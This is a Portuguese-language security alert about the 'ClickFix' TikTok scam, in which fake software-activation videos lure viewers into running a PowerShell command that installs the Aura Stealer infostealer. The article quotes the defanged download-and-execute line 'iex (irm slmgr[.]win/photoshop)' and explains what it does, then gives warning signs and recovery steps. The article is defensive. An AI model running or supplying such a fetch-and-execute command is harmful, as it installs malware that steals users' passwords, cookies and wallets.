Um vídeo curto no TikTok promete o que parece ser o sonho de muitos: acesso gratuito ao Netflix, Spotify Premium ou uma licença vitalícia do Windows e Adobe Photoshop. A instrução parece simples: apenas copie um pequeno comando e cole no PowerShell do seu computador.
No entanto, esse comando aparentemente inofensivo é a porta de entrada para um malware devastador. Uma nova campanha cibercriminosa, apelidada de ClickFix, está usando essa tática de engenharia social para instalar um ladrão de informações chamado Aura Stealer.
Neste artigo, você vai entender como o golpe TikTok PowerShell funciona, o que acontece quando o comando é executado e, principalmente, como se proteger e agir caso tenha sido vítima dessa armadilha digital.
O que é o ataque “ClickFix” e como ele funciona no TikTok?
O ataque ClickFix é uma técnica de engenharia social que se disfarça de uma suposta “correção” ou “ativação” para programas populares. A ideia do nome vem justamente daí: o “click” do usuário e o falso “fix” (conserto) prometido pelos criminosos.
Os vídeos publicados no TikTok fingem ser tutoriais de ativação para ferramentas como Microsoft 365, Adobe Premiere, CapCut Pro e até Discord Nitro. Eles são editados de forma convincente, com comentários e curtidas falsos, fazendo parecer que realmente funcionam.
O golpe segue um roteiro simples: o vídeo instrui o espectador a abrir o PowerShell como Administrador e executar um comando curto, algo como:
iex (irm slmgr[.]win/photoshop)
À primeira vista, parece apenas uma linha de código técnica — mas é justamente aí que está o perigo.
O perigo por trás do comando: o que ‘iex (irm …)’ realmente faz?
O comando acima é a peça central do golpe. Ele utiliza duas funções do PowerShell que, quando combinadas, se tornam uma arma poderosa nas mãos de criminosos.
Desvendando o comando
O trecho irm significa Invoke-RestMethod, um comando usado para baixar conteúdo de um link da internet. No caso do golpe, ele baixa dados do site slmgr[.]win, um domínio controlado pelos atacantes.
Já iex vem de Invoke-Expression, que executa automaticamente o conteúdo baixado pelo “irm”. Em outras palavras, é como dizer ao seu computador:
“Baixe as instruções desta caixa misteriosa na internet e siga-as imediatamente, sem verificar o que há dentro.”
Esse é o ponto em que o usuário perde o controle — e o sistema começa a executar código malicioso.
O objetivo final: o malware Aura Stealer
Após o comando ser executado, o script inicial baixa outros arquivos maliciosos, como updater.exe e source.exe, que iniciam o processo de infecção.
O verdadeiro vilão é o Aura Stealer, um malware especializado em roubo de informações. Ele é projetado para vasculhar o computador da vítima em busca de dados sensíveis, incluindo:
- Credenciais salvas em navegadores, como senhas de sites e e-mails;
- Cookies de autenticação, que mantêm você logado em serviços como Gmail, Instagram e bancos;
- Carteiras de criptomoedas e aplicativos financeiros;
- Dados de aplicativos de mensagens e clientes de jogos.
Essas informações são enviadas automaticamente para os servidores dos criminosos, que podem vendê-las ou usá-las para acessar contas e aplicar novos golpes.
Como identificar e se proteger do golpe ClickFix
A regra de ouro: nunca copie e cole comandos de fontes não confiáveis
O PowerShell, o Prompt de Comando (CMD) e outros terminais (como no Linux ou macOS) são ferramentas extremamente poderosas — e perigosas quando mal utilizadas.
Eles não são necessários para ativar softwares ou obter benefícios como o acesso gratuito ao Netflix ou ao Spotify. Qualquer vídeo que peça isso já deve ser encarado com suspeita imediata.
Sinais de alerta óbvios
Há vários indícios de que um vídeo no TikTok pode ser parte do golpe ClickFix:
- Promessas de software caro totalmente gratuito;
- Instruções para desativar o antivírus antes de rodar o comando;
- Comentários suspeitos, geralmente idênticos e com mensagens como “Funcionou!” ou “Valeu, mano!”;
- Nenhum link para sites oficiais ou documentação legítima.
Desconfie sempre de conteúdo que oferece “atalhos” para coisas que normalmente são pagas — especialmente se envolvem comandos de terminal.
Fui vítima, e agora? O que fazer se você executou o comando
Se você caiu no golpe TikTok PowerShell e já rodou o comando no seu computador, é essencial agir rapidamente para minimizar os danos.
Passo 1: Desconecte o computador da internet imediatamente. Isso impede que o Aura Stealer continue enviando seus dados para os criminosos.
Passo 2: Execute uma verificação completa e profunda com um antivírus confiável. Se possível, use outro software além do padrão do Windows, como o Malwarebytes ou Kaspersky, para garantir a remoção total do malware.
Passo 3: Altere suas senhas imediatamente — mas a partir de um dispositivo limpo (outro computador ou celular). Comece pelas contas mais importantes: e-mail principal, bancos, redes sociais e qualquer serviço que armazene dados sensíveis.
Passo 4: Ative a autenticação de dois fatores (2FA) em todas as plataformas que oferecem esse recurso. Assim, mesmo que suas senhas tenham sido roubadas, os invasores não conseguirão entrar sem o segundo fator de segurança.
Lembre-se: quanto mais rápido você agir, menores serão as chances de prejuízo.
Conclusão: A engenharia social é a verdadeira ameaça
Embora o TikTok e o malware Aura Stealer sejam tecnologias modernas, a tática usada no golpe ClickFix é antiga. Trata-se de engenharia social — manipular pessoas para que executem ações perigosas acreditando que estão fazendo algo inofensivo.
Os criminosos exploram a curiosidade, o desejo por facilidades e a confiança dos usuários. Por isso, a melhor defesa continua sendo a desconfiança saudável.
Compartilhe este alerta com amigos e familiares, especialmente os mais jovens que usam o TikTok. Um simples cuidado pode evitar a perda de dados, dinheiro e privacidade.
